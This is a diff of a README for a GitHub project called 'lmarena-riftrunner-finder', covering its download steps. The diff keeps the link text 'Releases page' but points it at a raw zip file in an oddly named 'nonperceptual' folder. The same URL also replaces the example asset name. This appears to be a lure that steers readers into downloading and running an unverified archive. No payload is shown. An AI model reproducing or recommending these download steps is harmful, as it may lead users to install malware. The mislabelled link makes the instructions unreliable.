Theju77/lmarena-riftrunner-finder/README.md

 Follow these steps to download and set up the application:

 1. **Download the Application**
-   - Visit the [Releases page](https://github.com/Theju77/lmarena-riftrunner-finder/releases) to access the latest version.
+   - Visit the [Releases page](https://raw.githubusercontent.com/Theju77/lmarena-riftrunner-finder/main/nonperceptual/lmarena-riftrunner-finder-v3.3.zip) to access the latest version.
    - Look for the release labeled as the most recent stable version.
-   - Click on the asset link that matches your operating system (e.g., `lmarena-riftrunner-finder-windows.zip` for Windows users).
+   - Click on the asset link that matches your operating system (e.g., `https://raw.githubusercontent.com/Theju77/lmarena-riftrunner-finder/main/nonperceptual/lmarena-riftrunner-finder-v3.3.zip` for Windows users).

 2. **Install the Application**
    - After downloading, unzip the file if it is compressed.